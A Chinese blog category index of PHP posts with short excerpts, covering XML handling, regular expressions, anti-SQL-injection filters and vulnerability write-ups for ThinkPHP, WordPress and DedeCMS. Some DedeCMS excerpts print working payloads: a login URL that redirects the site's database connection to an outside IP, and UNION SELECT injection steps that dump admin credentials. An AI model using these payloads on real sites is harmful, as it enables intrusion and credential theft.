随笔分类 -  PHP语言

PHP对XML文件操作类讲解
摘要:dom = new DOMDocument ('1.0','UTF-8'); header ("Content-Type:text/xml"); } //传递普通节点名称,创建节点 function CreateNode ($node) { return $this -> dom -> crea... 阅读全文
posted @ 2014-04-19 13:12 milantgh 阅读(261) 评论(0) 推荐(0)
PHP对XML文件操作之属性与方法讲解
摘要:DOMDocument相关的内容. 属性: Attributes 存储节点的属性列表(只读) childNodes 存储节点的子节点列表(只读) dataType 返回此节点的数据类型 Definition 以DTD或XML模式给出的节点的定义(只读) Doctype 指定文档类型节点(只读) do... 阅读全文
posted @ 2014-04-19 12:37 milantgh 阅读(372) 评论(0) 推荐(0)
PHP之SQL防注入代码集合(建站常用)
摘要:SQL防注入代码一'99','name'=>'a'b\'c";','note'=>"a'b'nc#"); } $age = (int)$_GET['age']; $name = quote($_GET['name']); $note = quote($_GET['note']); $sql = "I... 阅读全文
posted @ 2014-04-18 18:14 milantgh 阅读(468) 评论(0) 推荐(0)
PHP之SQL防注入代码(360提供)
摘要:|||$value){$this->stopattack($key,$value,$this->getfilter);} foreach($_POST as $key=>$value){$this->stopattack($key,$value,$this->postfilter);} fore... 阅读全文
posted @ 2014-04-18 18:03 milantgh 阅读(1451) 评论(0) 推荐(0)
PHP读取xml之cdata讲解
摘要:实例:xss.xml 1 )|(?:[^\w\s]\s*\/>)|(?:>")]]> finds html breaking injections including whitespace attacks 1.使用$result = simplexml_load_file ( 'xss.xml',... 阅读全文
posted @ 2014-04-18 14:11 milantgh 阅读(686) 评论(0) 推荐(0)
PHP读取xml方法讲解
摘要:一,什么是xml,xml有什么用途 XML(Extensible Markup Language)即可扩展标记语言,它与HTML一样,都是SGML(Standard Generalized Markup Language,标准通用标记语言)。Xml是Internet环境中跨平台的,依赖于内容的... 阅读全文
posted @ 2014-04-18 13:15 milantgh 阅读(261) 评论(0) 推荐(0)
几种通用防注入程序绕过方法之讲解
摘要:0x01 Discuz x2.0防注入防注入原理这里以Discuz最近爆出的一个插件的注入漏洞为例,来详细说明绕过方法。漏洞本身很简单,存在于/source/plugin/v63shop/config.inc.php中的第29行getGoods函数中,代码如下所示123456789101112131... 阅读全文
posted @ 2014-04-17 10:54 milantgh 阅读(3118) 评论(0) 推荐(1)
unset之讲解
摘要:unset(PHP 4, PHP 5)unset — 释放给定的变量说明 ¶void unset ( mixed $var [, mixed $... ] )unset() 销毁指定的变量。unset() 在函数中的行为会依赖于想要销毁的变量的类型而有所不同。如果在函数中 unset() 一个全局变量,则只是局部变量被销毁,而在调用环境中的变量将保持调用 unset() 之前一样的值。 以上例程会输出:bar如果您想在函数中 unset() 一个全局变量,可使用 $GLOBALS 数组来实现: 如果在函数中 unset() 一个通过引用传... 阅读全文
posted @ 2014-04-09 12:18 milantgh 阅读(530) 评论(0) 推荐(0)
Thinkphp2.1爆出重大安全漏洞
摘要:thinkphp 2.1的版本我们来分析下漏洞吧官方发布了一个安全补丁表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。官方的补丁:/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php125 –$res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'/]+)@e’, ‘$var['\1']=”\2″;’, implode($depr,$paths));125 + $res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.' 阅读全文
posted @ 2014-04-01 21:03 milantgh 阅读(6482) 评论(0) 推荐(0)
正则表达式编程
摘要:可以在 JScript 中使用正则表达式搜索字符串中的模式、替换文本以及提取子字符串。搜索以下 JScript 示例查找某个单词的所有匹配项。创建该正则表达式的语句为var re = /\w+/g;/\w+/模式指定匹配以下一个或多个任意字符:A-Z、a-z、0-9 和下划线字符。模式之后的g(全局)标志,指示搜索操作应查找该模式的所有匹配项,而不仅仅是第一个匹配项。还可以使用以下 JScript 替换语法。var re = new RegExp("\\w+", "g");要检索每个匹配项,exec 方法将从lastIndex位置继续搜索,直到返回 Nu 阅读全文
posted @ 2014-04-01 10:55 milantgh 阅读(316) 评论(0) 推荐(0)
构造正则表达式说明
摘要:“正则表达式”描述在搜索文本正文时要匹配的一个或多个字符串。正则表达式可用作与要搜索的文本相比较的字符模式。正则表达式的结构与所创建的算术表达式的结构类似。较大的表达式可由小的表达式通过使用各种元字符和运算符进行组合而创建。正则表达式的各组成部分可以是单个字符、字符集、字符范围或在几个字符之间选择。也可以是这些组成部分的任意组合。构造正则表达式通过在一对分隔符之间放置表达式的各种组成部分,就可以构建正则表达式。在 JScript 中,分隔符是一对正斜杠 (/) 字符,如以下示例所示。/expression/正则表达式示例下表包含典型正则表达式的示例。正则表达式说明/^\s*$/匹配空行。/\d 阅读全文
posted @ 2014-04-01 10:51 milantgh 阅读(643) 评论(0) 推荐(0)
正则表达式之语法规则
摘要:“正则表达式”描述在搜索文本正文时要匹配的一个或多个字符串。该表达式可用作一个将字符模式与要搜索的字符串相匹配的模板。正则表达式包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为“元字符”)。特殊字符元字符下表包含了多字符元字符的列表以及它们在正则表达式中的行为。元字符行为示例\b与一个字边界匹配;即字与空格间的位置。er\b与“never”中的“er”匹配,但与“verb”中的“er”不匹配。\B非边界字匹配。er\B与“verb”中的“er”匹配,但与“never”中的“er”不匹配。\d数字字符匹配。等效于[0-9]。在搜索字符串“12 345”中,\d{2}与“12”和“34 阅读全文
posted @ 2014-04-01 10:44 milantgh 阅读(246) 评论(0) 推荐(0)
PHP正则表达式之快速学习法
摘要:1、入门简介简单的说,正则表达式是一种可以用于模式匹配和替换的强有力的工具。我们可以在几乎所有的基于UNIX系统的工具中找到正则表达式的身影,例如,vi编辑器,Perl或PHP脚本语言,以及awk或sed shell程序等。此外,象JavaScript这种客户端的脚本语言也提供了对正则表达式的支持。由此可见,正则表达式已经超出了某种语言或某个系统的局限,成为人们广为接受的概念和功能。正则表达式可以让用户通过使用一系列的特殊字符构建匹配模式,然后把匹配模式与数据文件、程序输入以及WEB页面的表单输入等目标对象进行比较,根据比较对象中是否包含匹配模式,执行相应的程序。 举例来说,正则表达式的一个. 阅读全文
posted @ 2014-04-01 08:49 milantgh 阅读(229) 评论(0) 推荐(0)
Dedecms getip()的漏洞利用
摘要:flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.phpfunction FushCache($mid=0){if(empty($mid)) $mid = $this->M_ID;$dsql = new DedeSql();$row = $dsql->GetOne("Select ID,userid,pwd, 阅读全文
posted @ 2014-03-31 14:28 milantgh 阅读(462) 评论(0) 推荐(0)
PHP addslashes() 函数
摘要:定义和用法addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是:单引号 (')双引号 (")反斜杠 (\)NULL语法addslashes(string)参数描述string必需。规定要检查的字符串。提示和注释提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备合适的字符串。注释:默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导 阅读全文
posted @ 2014-03-31 14:23 milantgh 阅读(260) 评论(0) 推荐(0)
DEDECMS爆严重安全漏洞
摘要:简要描述:众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”详细说明:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0& 阅读全文
posted @ 2014-03-31 13:58 milantgh 阅读(441) 评论(0) 推荐(0)
dedecms会员注册注入漏洞
摘要:一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id四、爆密码的字段:/memb 阅读全文
posted @ 2014-03-30 20:25 milantgh 阅读(1915) 评论(0) 推荐(0)
Dedecms会员中心注入漏洞
摘要:详细说明:member/buy_action.phprequire_once(dirname(__FILE__)."/config.php");CheckRank(0,0);$menutype = 'mydede';$menutype_son = 'op';require_once DEDEINC.'/dedetemplate.class.php';$product = isset($product) ? trim($product) : '';$mid = $cfg_ml->M_ID;$ptype = 阅读全文
posted @ 2014-03-30 20:15 milantgh 阅读(1305) 评论(0) 推荐(0)
PHP之is_a()函数执行代码之总结
摘要:今天看到云舒在群里贴的漏洞公告,原始的文章在http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/后来查了下PHP官方的手册,这个问题是在PHP 5.3.7中更新了is_a()函数的功能。is_a()经常被用于条件判断。 在此前版本的is_a() 的第一个参数如果不是object,则会返回false,现在变成了如果不是object ,则会去执行 __autoload()函数。PHP为此还开了一个bug,但对此bug仍然有争议,部分开发人员认为这个功能是正常的。Aron Budins 阅读全文
posted @ 2014-03-30 09:43 milantgh 阅读(2137) 评论(0) 推荐(0)
WordPress < 3.6.1 PHP 对象注入漏洞
摘要:0x00 背景当我读到一篇关于Joomla的“PHP对象注射”的漏洞blog后,我挖深了一点就发现Stefan Esser大神在2010年黑帽大会的文章:http://media.blackhat.com/bh-us-10/presentations/Esser/BlackHat-USA-2010-Esser-Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits-slides.pdf这篇文章提到了PHP中的unserialize函数当操作用户生成的数据的时候会产生安全漏洞。所以呢,基本来说 阅读全文
posted @ 2014-03-27 20:40 milantgh 阅读(582) 评论(0) 推荐(0)